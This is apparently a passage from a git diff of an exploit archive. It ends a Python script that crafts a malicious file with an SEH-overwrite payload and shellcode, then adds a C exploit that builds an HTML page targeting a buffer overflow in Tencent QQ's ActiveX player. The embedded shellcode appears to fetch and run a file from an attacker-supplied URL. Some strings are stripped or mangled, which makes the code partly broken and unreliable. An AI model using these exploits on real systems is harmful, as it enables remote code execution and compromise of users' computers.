content += '\x01\x00\x30\x8d\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00'
content += '\x1b\x00' # vulnerable record type
payload = ''
payload += '\x90' * (seh_offset - 4) #others too
payload += '\xeb\x06\x90\x90' # jmp six bytes forward
payload += pack('<L', jumper)
payload += shellcode
content += pack('<H', len(payload))
content += payload
fd = open(filename, 'wb')
fd.write(content)
fd.close()
if len(argv) is not 2:
print '[-] Must specify a filename. Remember to change the pop pop ret address! :)'
else:
createMaliciousFile(argv[1])

229
platforms/windows/remote/30819.c Executable file
View file

@ -0,0 +1,229 @@
source: http://www.securityfocus.com/bid/26613/info
Tencent QQ is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
These issues affect Tencent QQ 2006 and prior versions.
#include
#include
#include
FILE *fp = NULL;
char *file = "fuck_exp1.html";
char *url = NULL;
unsigned char sc[] =
"x60x64xa1x30x00x00x00x8bx40x0cx8bx70x1cxadx8bx70"
"x08x81xecx00x04x00x00x8bxecx56x68x8ex4ex0execxe8"
"xffx00x00x00x89x45x04x56x68x98xfex8ax0exe8xf1x00"
"x00x00x89x45x08x56x68x25xb0xffxc2xe8xe3x00x00x00"
"x89x45x0cx56x68xefxcexe0x60xe8xd5x00x00x00x89x45"
"x10x56x68xc1x79xe5xb8xe8xc7x00x00x00x89x45x14x40"
"x80x38xc3x75xfax89x45x18xe9x08x01x00x00x5ex89x75"
"x24x8bx45x04x6ax01x59x8bx55x18x56xe8x8cx00x00x00"
"x50x68x36x1ax2fx70xe8x98x00x00x00x89x45x1cx8bxc5"
"x83xc0x50x89x45x20x68xffx00x00x00x50x8bx45x14x6a"
"x02x59x8bx55x18xe8x62x00x00x00x03x45x20xc7x00x5c"
"x7ex2ex65xc7x40x04x78x65x00x00xffx75x20x8bx45x0c"
"x6ax01x59x8bx55x18xe8x41x00x00x00x6ax07x58x03x45"
"x24x33xdbx53x53xffx75x20x50x53x8bx45x1cx6ax05x59"
"x8bx55x18xe8x24x00x00x00x6ax00xffx75x20x8bx45x08"
"x6ax02x59x8bx55x18xe8x11x00x00x00x81xc4x00x04x00"
"x00x61x81xc4xdcx04x00x00x5dxc2x24x00x41x5bx52x03"
"xe1x03xe1x03xe1x03xe1x83xecx04x5ax53x8bxdaxe2xf7"
"x52xffxe0x55x8bxecx8bx7dx08x8bx5dx0cx56x8bx73x3c"
"x8bx74x1ex78x03xf3x56x8bx76x20x03xf3x33xc9x49x41"
"xadx03xc3x56x33xf6x0fxbex10x3axf2x74x08xc1xcex0d"
"x03xf2x40xebxf1x3bxfex5ex75xe5x5ax8bxebx8bx5ax24"
"x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8bx04x8bx03xc5"
"x5ex5dxc2x08x00xe8xf3xfexffxffx55x52x4cx4dx4fx4e"
"x00";
char * header =
" "
" "
" "
" ";
char * trigger =
" "
" "
" "
" "
" ";
// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i{
if((i%16)==0)
{
if(i!=0)
{
printf("" "");
fprintf(fp, "%s", "" + "");
}
else
{
printf(""");
fprintf(fp, "%s", """);
}
}
printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}
//?shellcode???header??,??? " ) " ??
printf(""; ");
fprintf(fp, "%s", ""); ");
fflush(fp);
}
void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
int sc_len = 0;
if (argc < 2)
{
printf("Tencent QQ VQQPlayer.ocx (all version) 0day! ");
printf("Bug Found by axis@ph4nt0m ");
printf("Date: 2006-12-27 ");
printf(" Usage: %s [Local htmlfile] ", argv[0]);
exit(1);
}
url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://' ");
return;
}
printf("[+] download url:%s ", url);
if(argc >=3) file = argv[2];
printf("[+] exploit file:%s ", file);
fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error! ");
return;
}
//build evil html file
fprintf(fp, "%s", header);
fflush(fp);
memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));
sc_len += strlen(url)+1;
PrintPayLoad((char *)buf, sc_len);
fprintf(fp, "%s", footer);
fflush(fp);
fprintf(fp, "%s", trigger);
fflush(fp);
printf("[+] exploit write to %s success! ", file);
}